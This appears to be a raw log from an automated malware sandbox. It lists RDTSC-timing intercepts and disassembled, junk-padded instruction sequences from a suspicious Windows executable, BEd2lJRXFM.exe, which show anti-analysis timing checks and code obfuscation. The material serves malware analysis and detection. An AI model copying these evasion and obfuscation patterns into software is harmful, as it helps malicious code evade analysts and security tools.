Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AACA11 second address: AACA18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AACA18 second address: AACA20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AAF82F second address: AAF833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AB1042 second address: AB1046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AB1046 second address: AB105C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F270C8198CCh 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AB105C second address: AB1065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AB1065 second address: AB1069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AB3EF2 second address: AB3EFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F270C81A206h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AB3EFD second address: AB3F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 je 00007F270C8198CCh 0x0000000f jne 00007F270C8198C6h 0x00000015 pop ecx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jmp 00007F270C8198D3h 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 jmp 00007F270C8198D6h 0x00000027 pop eax 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push esi 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F270C8198CEh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AB705F second address: AB706C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 ja 00007F270C81A208h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AB706C second address: AB7071 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AB7071 second address: AB7077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4DC0357 second address: 4DC035C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4DC035C second address: 4DC03A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F270C81A214h 0x00000012 adc eax, 52C8BFE8h 0x00000018 jmp 00007F270C81A20Bh 0x0000001d popfd 0x0000001e movzx ecx, dx 0x00000021 popad 0x00000022 xchg eax, ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F270C81A20Eh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4DC03A4 second address: 4DC03B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F270C8198CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4DC03B6 second address: 4DC01F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A20Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call dword ptr [74E5188Ch] 0x00000011 mov edi, edi 0x00000013 push ebp 0x00000014 mov ebp, esp 0x00000016 push ecx 0x00000017 mov ecx, dword ptr [7FFE0004h] 0x0000001d mov dword ptr [ebp-04h], ecx 0x00000020 cmp ecx, 01000000h 0x00000026 jc 00007F270C84BCE5h 0x0000002c mov eax, 7FFE0320h 0x00000031 mov eax, dword ptr [eax] 0x00000033 mul ecx 0x00000035 shrd eax, edx, 00000018h 0x00000039 mov esp, ebp 0x0000003b pop ebp 0x0000003c ret 0x0000003d jmp 00007F270C81A216h 0x00000042 pop ecx 0x00000043 pushad 0x00000044 mov di, si 0x00000047 mov ax, 6B69h 0x0000004b popad 0x0000004c ret 0x0000004d nop 0x0000004e xor esi, eax 0x00000050 lea eax, dword ptr [ebp-10h] 0x00000053 push eax 0x00000054 call 00007F27111D6E41h 0x00000059 mov edi, edi 0x0000005b pushad 0x0000005c pushad 0x0000005d push ebx 0x0000005e pop esi 0x0000005f jmp 00007F270C81A215h 0x00000064 popad 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F270C81A20Eh 0x0000006c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4DC01F6 second address: 4DC0250 instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a call 00007F270C8198CAh 0x0000000f jmp 00007F270C8198D2h 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F270C8198CBh 0x0000001b xor eax, 2FEB8A1Eh 0x00000021 jmp 00007F270C8198D9h 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c mov dl, 71h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4DC0250 second address: 4DC02F4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F270C81A216h 0x00000008 and ah, 00000048h 0x0000000b jmp 00007F270C81A20Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F270C81A218h 0x00000019 or eax, 0915C1A8h 0x0000001f jmp 00007F270C81A20Bh 0x00000024 popfd 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 mov cl, 37h 0x0000002a pushfd 0x0000002b jmp 00007F270C81A211h 0x00000030 add ax, 3DC6h 0x00000035 jmp 00007F270C81A211h 0x0000003a popfd 0x0000003b popad 0x0000003c mov ebp, esp 0x0000003e pushad 0x0000003f push esi 0x00000040 call 00007F270C81A213h 0x00000045 pop esi 0x00000046 pop edx 0x00000047 push eax 0x00000048 push edx 0x00000049 mov ecx, 7B5D977Bh 0x0000004e rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4DC02F4 second address: 4DC031A instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 5CA43057h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F270C8198D9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4DC031A second address: 4DC0320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70008 second address: 4D7000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D7000C second address: 4D70012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70012 second address: 4D70029 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bx, BC18h 0x00000013 movsx edx, si 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70029 second address: 4D70074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A213h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d jmp 00007F270C81A214h 0x00000012 pushad 0x00000013 mov ch, 7Fh 0x00000015 movsx edx, cx 0x00000018 popad 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F270C81A20Eh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70074 second address: 4D70083 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70083 second address: 4D70089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70089 second address: 4D7008D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D7008D second address: 4D700E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e pushad 0x0000000f mov edi, 0B8B0950h 0x00000014 mov ecx, edx 0x00000016 popad 0x00000017 sub esp, 18h 0x0000001a jmp 00007F270C81A20Bh 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 mov cx, E37Bh 0x00000025 pushfd 0x00000026 jmp 00007F270C81A210h 0x0000002b sub ah, FFFFFFC8h 0x0000002e jmp 00007F270C81A20Bh 0x00000033 popfd 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D700E0 second address: 4D700E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D700E4 second address: 4D700F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A20Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D700F6 second address: 4D7010C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D7010C second address: 4D70127 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A217h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70127 second address: 4D7012D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D7012D second address: 4D70131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70131 second address: 4D7015A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b pushad 0x0000000c mov edx, 1DC4C2D0h 0x00000011 mov dh, 3Bh 0x00000013 popad 0x00000014 xchg eax, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 call 00007F270C8198CDh 0x0000001d pop eax 0x0000001e push edx 0x0000001f pop ecx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D7015A second address: 4D701C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F270C81A218h 0x00000009 sbb si, 3978h 0x0000000e jmp 00007F270C81A20Bh 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007F270C81A20Fh 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 movsx ebx, ax 0x00000026 pushfd 0x00000027 jmp 00007F270C81A20Ch 0x0000002c add cl, 00000008h 0x0000002f jmp 00007F270C81A20Bh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D701C0 second address: 4D701C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D701C6 second address: 4D701CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D701CA second address: 4D701CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D701CE second address: 4D702BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [74E806ECh] 0x0000000e pushad 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F270C81A213h 0x00000016 jmp 00007F270C81A213h 0x0000001b popfd 0x0000001c mov edx, ecx 0x0000001e popad 0x0000001f pushfd 0x00000020 jmp 00007F270C81A214h 0x00000025 sbb ax, C2F8h 0x0000002a jmp 00007F270C81A20Bh 0x0000002f popfd 0x00000030 popad 0x00000031 test esi, esi 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F270C81A214h 0x0000003a or ch, 00000058h 0x0000003d jmp 00007F270C81A20Bh 0x00000042 popfd 0x00000043 pushfd 0x00000044 jmp 00007F270C81A218h 0x00000049 add ch, FFFFFFB8h 0x0000004c jmp 00007F270C81A20Bh 0x00000051 popfd 0x00000052 popad 0x00000053 jne 00007F270C81B03Dh 0x00000059 jmp 00007F270C81A216h 0x0000005e xchg eax, edi 0x0000005f jmp 00007F270C81A210h 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F270C81A20Eh 0x0000006c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D702BE second address: 4D70370 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, B824h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, edi 0x0000000b jmp 00007F270C8198D6h 0x00000010 call dword ptr [74E50B60h] 0x00000016 mov eax, 750BE5E0h 0x0000001b ret 0x0000001c pushad 0x0000001d movzx esi, dx 0x00000020 pushfd 0x00000021 jmp 00007F270C8198D3h 0x00000026 adc eax, 2A8D519Eh 0x0000002c jmp 00007F270C8198D9h 0x00000031 popfd 0x00000032 popad 0x00000033 push 00000044h 0x00000035 jmp 00007F270C8198CEh 0x0000003a pop edi 0x0000003b pushad 0x0000003c movzx eax, di 0x0000003f call 00007F270C8198D3h 0x00000044 jmp 00007F270C8198D8h 0x00000049 pop ecx 0x0000004a popad 0x0000004b push esp 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F270C8198CDh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70370 second address: 4D7038E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A211h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D7038E second address: 4D70392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70392 second address: 4D703A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A20Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D703A5 second address: 4D703B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D703B5 second address: 4D703CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A212h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70457 second address: 4D7046B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F270C8198D0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D7046B second address: 4D7046F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D7046F second address: 4D704F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b mov esi, edx 0x0000000d jmp 00007F270C8198D9h 0x00000012 popad 0x00000013 je 00007F277C8A8AD8h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F270C8198D3h 0x00000022 sbb ecx, 2DA3D16Eh 0x00000028 jmp 00007F270C8198D9h 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007F270C8198D0h 0x00000034 sbb cx, 94E8h 0x00000039 jmp 00007F270C8198CBh 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D704F6 second address: 4D704FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D704FC second address: 4D70500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70500 second address: 4D7053B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A20Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d jmp 00007F270C81A20Fh 0x00000012 mov dword ptr [esi], edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F270C81A215h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D7053B second address: 4D705C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c jmp 00007F270C8198CEh 0x00000011 mov dword ptr [esi+08h], eax 0x00000014 jmp 00007F270C8198D0h 0x00000019 mov dword ptr [esi+0Ch], eax 0x0000001c pushad 0x0000001d mov dh, cl 0x0000001f pushfd 0x00000020 jmp 00007F270C8198D3h 0x00000025 adc ecx, 0E79CCFEh 0x0000002b jmp 00007F270C8198D9h 0x00000030 popfd 0x00000031 popad 0x00000032 mov eax, dword ptr [ebx+4Ch] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F270C8198CDh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D705C1 second address: 4D70625 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F270C81A217h 0x00000008 pop ecx 0x00000009 jmp 00007F270C81A219h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esi+10h], eax 0x00000014 jmp 00007F270C81A20Eh 0x00000019 mov eax, dword ptr [ebx+50h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F270C81A217h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70625 second address: 4D7063D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F270C8198D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D7063D second address: 4D706C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+14h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 popad 0x00000011 popad 0x00000012 mov eax, dword ptr [ebx+54h] 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F270C81A213h 0x0000001c and ax, 9D3Eh 0x00000021 jmp 00007F270C81A219h 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esi+18h], eax 0x0000002b jmp 00007F270C81A20Dh 0x00000030 mov eax, dword ptr [ebx+58h] 0x00000033 jmp 00007F270C81A20Eh 0x00000038 mov dword ptr [esi+1Ch], eax 0x0000003b jmp 00007F270C81A210h 0x00000040 mov eax, dword ptr [ebx+5Ch] 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D706C4 second address: 4D706C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D706C8 second address: 4D706CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D706CE second address: 4D706D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D706D4 second address: 4D706D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D706D8 second address: 4D70708 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+20h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F270C8198D7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70708 second address: 4D70732 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ecx, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebx+60h] 0x0000000d pushad 0x0000000e jmp 00007F270C81A20Dh 0x00000013 mov bh, ah 0x00000015 popad 0x00000016 mov dword ptr [esi+24h], eax 0x00000019 pushad 0x0000001a mov bh, B6h 0x0000001c pushad 0x0000001d movzx eax, di 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70732 second address: 4D7077D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [ebx+64h] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F270C8198D2h 0x00000012 adc ecx, 67D12E18h 0x00000018 jmp 00007F270C8198CBh 0x0000001d popfd 0x0000001e call 00007F270C8198D8h 0x00000023 pop eax 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D7077D second address: 4D70798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F270C81A217h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70798 second address: 4D707A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+28h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D707A9 second address: 4D707B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A20Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D707B7 second address: 4D707E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+68h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F270C8198D5h 0x00000013 rdtsc
